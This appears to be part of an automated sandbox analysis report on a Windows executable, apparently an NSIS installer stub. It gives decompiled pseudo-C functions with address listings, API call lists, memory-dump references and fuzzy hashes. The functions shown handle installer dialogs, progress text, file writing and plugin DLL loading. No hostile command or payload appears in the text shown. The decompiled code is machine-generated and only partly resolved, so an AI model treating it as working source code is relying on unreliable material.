                                                                                                        Function 00403F7F, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00403F7F(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                                                        0x00403f91
                                                                                                        0x00404025
                                                                                                        0x00000000
                                                                                                        0x00404025
                                                                                                        0x00403fa2
                                                                                                        0x00403fa6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403fac
                                                                                                        0x00403fb5
                                                                                                        0x00403fb8
                                                                                                        0x00403fb8
                                                                                                        0x00403fbe
                                                                                                        0x00403fc4
                                                                                                        0x00403fc4
                                                                                                        0x00403fd0
                                                                                                        0x00403fd6
                                                                                                        0x00403fdd
                                                                                                        0x00403fe0
                                                                                                        0x00403fe3
                                                                                                        0x00403fe5
                                                                                                        0x00403fe5
                                                                                                        0x00403fed
                                                                                                        0x00403ff3
                                                                                                        0x00403ff3
                                                                                                        0x00403ffd
                                                                                                        0x00404002
                                                                                                        0x00404005
                                                                                                        0x0040400a
                                                                                                        0x0040400d
                                                                                                        0x0040400d
                                                                                                        0x0040401d
                                                                                                        0x0040401d
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2320649405-0
                                                                                                        • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                        • Instruction ID: 4cc26f8bf5fc777f430f8318c3ba194748f169832e683f7fcd21add738ba3f9d
                                                                                                        • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                        • Instruction Fuzzy Hash: C221C371904705ABCB209F78DD08B4BBBF8AF40711F048A29F992F26E0C738E904CB55
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040267C, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 93%
                                                                                                        			E0040267C(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029F6(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004056C6(_t52) == 0) {
					E004029F6(0xffffffed);
				}
				E0040581E(_t52);
				_t27 = E0040583D(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4;
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031F1(_t47);
						E004031BF(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F18(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E004057FE( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F18(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                                                                        0x0040267c
                                                                                                        0x0040267e
                                                                                                        0x0040268a
                                                                                                        0x0040268d
                                                                                                        0x00402697
                                                                                                        0x0040269b
                                                                                                        0x0040269b
                                                                                                        0x004026a1
                                                                                                        0x004026ae
                                                                                                        0x004026b6
                                                                                                        0x004026b9
                                                                                                        0x004026bf
                                                                                                        0x004026cd
                                                                                                        0x004026d2
                                                                                                        0x004026d6
                                                                                                        0x004026d9
                                                                                                        0x004026e2
                                                                                                        0x004026ee
                                                                                                        0x004026f2
                                                                                                        0x004026f5
                                                                                                        0x004026ff
                                                                                                        0x0040271e
                                                                                                        0x00402706
                                                                                                        0x0040270b
                                                                                                        0x00402713
                                                                                                        0x00402716
                                                                                                        0x0040271b
                                                                                                        0x0040271b
                                                                                                        0x00402725
                                                                                                        0x00402725
                                                                                                        0x00402737
                                                                                                        0x0040273e
                                                                                                        0x00402750
                                                                                                        0x00402750
                                                                                                        0x00402756
                                                                                                        0x00402756
                                                                                                        0x00402761
                                                                                                        0x00402762
                                                                                                        0x00402766
                                                                                                        0x0040276a
                                                                                                        0x00402770
                                                                                                        0x00402770
                                                                                                        0x00402777
                                                                                                        0x00402164
                                                                                                        0x0040288e
                                                                                                        0x0040289a

                                                                                                        APIs
                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
                                                                                                        • GlobalFree.KERNEL32 ref: 00402725
                                                                                                        • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402737
                                                                                                        • GlobalFree.KERNEL32 ref: 0040273E
                                                                                                        • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402756
                                                                                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3294113728-0
                                                                                                        • Opcode ID: b8defe13902d58a52973a2e3f60156d7c1400e5746f24ef4cd0721e59596b3c4
                                                                                                        • Instruction ID: 719c612f4f238206e278f6e296a81204df483451b361404a9b6a09c3536a307a
                                                                                                        • Opcode Fuzzy Hash: b8defe13902d58a52973a2e3f60156d7c1400e5746f24ef4cd0721e59596b3c4
                                                                                                        • Instruction Fuzzy Hash: F831AD71C00128BBDF216FA4CD89DAE7E79EF08364F10423AF920772E0C6795D419BA8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404F04, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 86%
                                                                                                        			E00404F04(long _a4, intOrPtr _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t26;
				long _t27;
				long _t28;
				signed int _t36;

				_t26 =  *0x423684;
				_v8 = _t26;
				if(_t26 != 0) {
					_t26 =  *0x423f54;
					_v12 = _t26;
					_t36 = _t26 & 0x00000001;
					if(_t36 == 0) {
						_t26 = E00405B88(0, _t36, 0x41fc78, 0x41fc78, _a4);
					}
					_push(0x41fc78);
					L00405B7C();
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc78);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc78;
							_v52 = 1;
							_t28 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t28 - _t36;
							SendMessageA(_v8, 0x1007 - _t36, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t36 != 0) {
							_t27 = _a4;
							 *((char*)(_t27 + 0x41fc78)) = 0;
							return _t27;
						}
					} else {
						_push(_a8);
						L00405B7C();
						_t26 = _t26 + _a4;
						if(_t26 < 0x800) {
							_push(_a8);
							_push(0x41fc78);
							L00405B82();
							goto L6;
						}
					}
				}
				return _t26;
			}
















                                                                                                        0x00404f0a
                                                                                                        0x00404f16
                                                                                                        0x00404f19
                                                                                                        0x00404f1f
                                                                                                        0x00404f2b
                                                                                                        0x00404f2e
                                                                                                        0x00404f31
                                                                                                        0x00404f37
                                                                                                        0x00404f37
                                                                                                        0x00404f3c
                                                                                                        0x00404f3d
                                                                                                        0x00404f45
                                                                                                        0x00404f48
                                                                                                        0x00404f65
                                                                                                        0x00404f69
                                                                                                        0x00404f72
                                                                                                        0x00404f72
                                                                                                        0x00404f7c
                                                                                                        0x00404f85
                                                                                                        0x00404f91
                                                                                                        0x00404f98
                                                                                                        0x00404f9c
                                                                                                        0x00404f9f
                                                                                                        0x00404fb2
                                                                                                        0x00404fc0
                                                                                                        0x00404fc0
                                                                                                        0x00404fc4
                                                                                                        0x00404fc6
                                                                                                        0x00404fc9
                                                                                                        0x00000000
                                                                                                        0x00404fc9
                                                                                                        0x00404f4a
                                                                                                        0x00404f4a
                                                                                                        0x00404f4d
                                                                                                        0x00404f52
                                                                                                        0x00404f5a
                                                                                                        0x00404f5c
                                                                                                        0x00404f5f
                                                                                                        0x00404f60
                                                                                                        0x00000000
                                                                                                        0x00404f60
                                                                                                        0x00404f5a
                                                                                                        0x00404f48
                                                                                                        0x00404fd3

                                                                                                        APIs
                                                                                                        • lstrlen.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                        • lstrlen.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                        • lstrcat.KERNEL32(0041FC78,00402C4A), ref: 00404F60
                                                                                                        • SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                        • String ID:
                                                                                                        • API String ID: 2531174081-0
                                                                                                        • Opcode ID: c16ae44753e0492e8ebf0dec6d4426dfb74cf51d03073e062323e975129af71d
                                                                                                        • Instruction ID: 33d69ec58002f5e3cec48cf4aa7ac502a1da6879986bf9ca4026f821734cd723
                                                                                                        • Opcode Fuzzy Hash: c16ae44753e0492e8ebf0dec6d4426dfb74cf51d03073e062323e975129af71d
                                                                                                        • Instruction Fuzzy Hash: C4219D71A00108BBDF119FA5CD849DEBFB9EB49354F14807AFA04B6290C3389E45CBA8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00402BD3, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 84%
                                                                                                        			E00402BD3(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x41704c; // 0x0
					if(_t15 != 0) {
						_t15 =  *0x4071e8(_t15);
					}
					 *0x41704c = 0;
					return _t15;
				}
				__eflags =  *0x41704c; // 0x0
				if(__eflags != 0) {
					return E00405EC1(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423eac;
				if(_t6 >  *0x423eac) {
					__eflags =  *0x423ea8;
					if( *0x423ea8 == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B3B, 0);
						 *0x41704c = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x423f54 & 0x00000001;
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BB7());
						return E00404F04(0,  &_v68);
					}
				}
				return _t6;
			}







                                                                                                        0x00402bdf
                                                                                                        0x00402be1
                                                                                                        0x00402be8
                                                                                                        0x00402beb
                                                                                                        0x00402beb
                                                                                                        0x00402bf1
                                                                                                        0x00000000
                                                                                                        0x00402bf1
                                                                                                        0x00402bf9
                                                                                                        0x00402bff
                                                                                                        0x00000000
                                                                                                        0x00402c02
                                                                                                        0x00402c09
                                                                                                        0x00402c0f
                                                                                                        0x00402c15
                                                                                                        0x00402c17
                                                                                                        0x00402c1d
                                                                                                        0x00402c5b
                                                                                                        0x00402c64
                                                                                                        0x00000000
                                                                                                        0x00402c69
                                                                                                        0x00402c1f
                                                                                                        0x00402c26
                                                                                                        0x00402c37
                                                                                                        0x00000000
                                                                                                        0x00402c45
                                                                                                        0x00402c26
                                                                                                        0x00402c71

                                                                                                        APIs
                                                                                                        • 73BC9840.USER32(00000000,00000000), ref: 00402BEB
                                                                                                        • GetTickCount.KERNEL32 ref: 00402C09
                                                                                                        • wsprintfA.USER32 ref: 00402C37
                                                                                                          • Part of subcall function 00404F04: lstrlen.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                          • Part of subcall function 00404F04: lstrlen.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                          • Part of subcall function 00404F04: lstrcat.KERNEL32(0041FC78,00402C4A), ref: 00404F60
                                                                                                          • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C5B
                                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402C69
                                                                                                          • Part of subcall function 00402BB7: MulDiv.KERNEL32(00000000,00000064,?), ref: 00402BCC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Windowlstrlen$C9840CountCreateDialogParamShowTextTicklstrcatwsprintf
                                                                                                        • String ID: ... %d%%
                                                                                                        • API String ID: 570735199-2449383134
                                                                                                        • Opcode ID: f8ace1eb95c0e61b2c61dafef86db0eeb17deac8452a01d8f5baf0090805ef89
                                                                                                        • Instruction ID: c44cf6bb529b7c61e0c77009ed50883557557090b8ffabf6f859222ef57aaf40
                                                                                                        • Opcode Fuzzy Hash: f8ace1eb95c0e61b2c61dafef86db0eeb17deac8452a01d8f5baf0090805ef89
                                                                                                        • Instruction Fuzzy Hash: C6016170949210EBD7215F61EE4DA9F7B78AB04701B14403BF502B11E5C6BC9A01CBAE
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004047D3, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004047D3(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                        0x004047e1
                                                                                                        0x004047ee
                                                                                                        0x004047f4
                                                                                                        0x00404832
                                                                                                        0x00404832
                                                                                                        0x00404841
                                                                                                        0x00404848
                                                                                                        0x00000000
                                                                                                        0x0040484a
                                                                                                        0x004047f6
                                                                                                        0x00404805
                                                                                                        0x0040480d
                                                                                                        0x00404810
                                                                                                        0x00404822
                                                                                                        0x00404828
                                                                                                        0x0040482f
                                                                                                        0x00000000
                                                                                                        0x0040482f
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004047EE
                                                                                                        • GetMessagePos.USER32 ref: 004047F6
                                                                                                        • ScreenToClient.USER32 ref: 00404810
                                                                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404822
                                                                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404848
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                        • String ID: f
                                                                                                        • API String ID: 41195575-1993550816
                                                                                                        • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                        • Instruction ID: 01d6173a61c3c3b4b037133c9a52f1e04ee3049876a8ff08b59bebc5d15cf036
                                                                                                        • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                        • Instruction Fuzzy Hash: BA018075D40218BADB00DB94CC41BFEBBBCAB55711F10412ABB00B61C0C3B46501CB95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00402B3B, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00402B3B(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BB7();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                                        0x00402b48
                                                                                                        0x00402b56
                                                                                                        0x00402b5c
                                                                                                        0x00402b5c
                                                                                                        0x00402b6a
                                                                                                        0x00402b6c
                                                                                                        0x00402b78
                                                                                                        0x00402b7d
                                                                                                        0x00402b7f
                                                                                                        0x00402b7f
                                                                                                        0x00402b8a
                                                                                                        0x00402b9a
                                                                                                        0x00402bac
                                                                                                        0x00402bac
                                                                                                        0x00402bb4

                                                                                                        APIs
                                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
                                                                                                        • wsprintfA.USER32 ref: 00402B8A
                                                                                                        • SetWindowTextA.USER32(?,?), ref: 00402B9A
                                                                                                        • SetDlgItemTextA.USER32 ref: 00402BAC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                        • API String ID: 1451636040-1158693248
                                                                                                        • Opcode ID: a19141f3df1e0a3c8b8c2abcbd515ef60a2dd56e778219f0b9cb34bd20a9fb2d
                                                                                                        • Instruction ID: 39266fd7d8b3d51d4259f470751267aa52f8e49dbca779dff7f29341b6a717b4
                                                                                                        • Opcode Fuzzy Hash: a19141f3df1e0a3c8b8c2abcbd515ef60a2dd56e778219f0b9cb34bd20a9fb2d
                                                                                                        • Instruction Fuzzy Hash: AFF03671900109ABEF255F51DD0ABEE3779FB00305F008036FA05B51D1D7F9AA559F99
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 59%
                                                                                                        			E00401F51(void* __ebx, void* __eflags) {
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423f28 =  *0x423f28 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E004029F6(0xfffffff0);
				 *(_t34 + 8) = E004029F6(1);
				if( *((intOrPtr*)(_t34 - 0x14)) == __ebx) {
					L3:
					_t30 = LoadLibraryExA(_t32, _t27, 8);
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404F04(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x1c)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 0x34)), 0x400, 0x424000, 0x40af70, " ?B");
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x1c)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x18)) == _t27 && E0040364F(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t30 = GetModuleHandleA(_t32);
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}








                                                                                                        0x00401f51
                                                                                                        0x00401f51
                                                                                                        0x00401f56
                                                                                                        0x00401f5d
                                                                                                        0x00402019
                                                                                                        0x00402164
                                                                                                        0x00402164
                                                                                                        0x0040288b
                                                                                                        0x0040288e
                                                                                                        0x0040289a
                                                                                                        0x0040289a
                                                                                                        0x00401f6c
                                                                                                        0x00401f76
                                                                                                        0x00401f79
                                                                                                        0x00401f88
                                                                                                        0x00401f92
                                                                                                        0x00401f96
                                                                                                        0x00402012
                                                                                                        0x00000000
                                                                                                        0x00402012
                                                                                                        0x00401f98
                                                                                                        0x00401fa2
                                                                                                        0x00401fa6
                                                                                                        0x00401fea
                                                                                                        0x00401fa8
                                                                                                        0x00401fab
                                                                                                        0x00401fae
                                                                                                        0x00401fde
                                                                                                        0x00401fb0
                                                                                                        0x00401fb3
                                                                                                        0x00401fbc
                                                                                                        0x00401fbe
                                                                                                        0x00401fbe
                                                                                                        0x00401fbc
                                                                                                        0x00401fae
                                                                                                        0x00401ff2
                                                                                                        0x00402007
                                                                                                        0x00402007
                                                                                                        0x00000000
                                                                                                        0x00401ff2
                                                                                                        0x00401f82
                                                                                                        0x00401f86
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F7C
                                                                                                          • Part of subcall function 00404F04: lstrlen.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                          • Part of subcall function 00404F04: lstrlen.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                          • Part of subcall function 00404F04: lstrcat.KERNEL32(0041FC78,00402C4A), ref: 00404F60
                                                                                                          • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                        • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
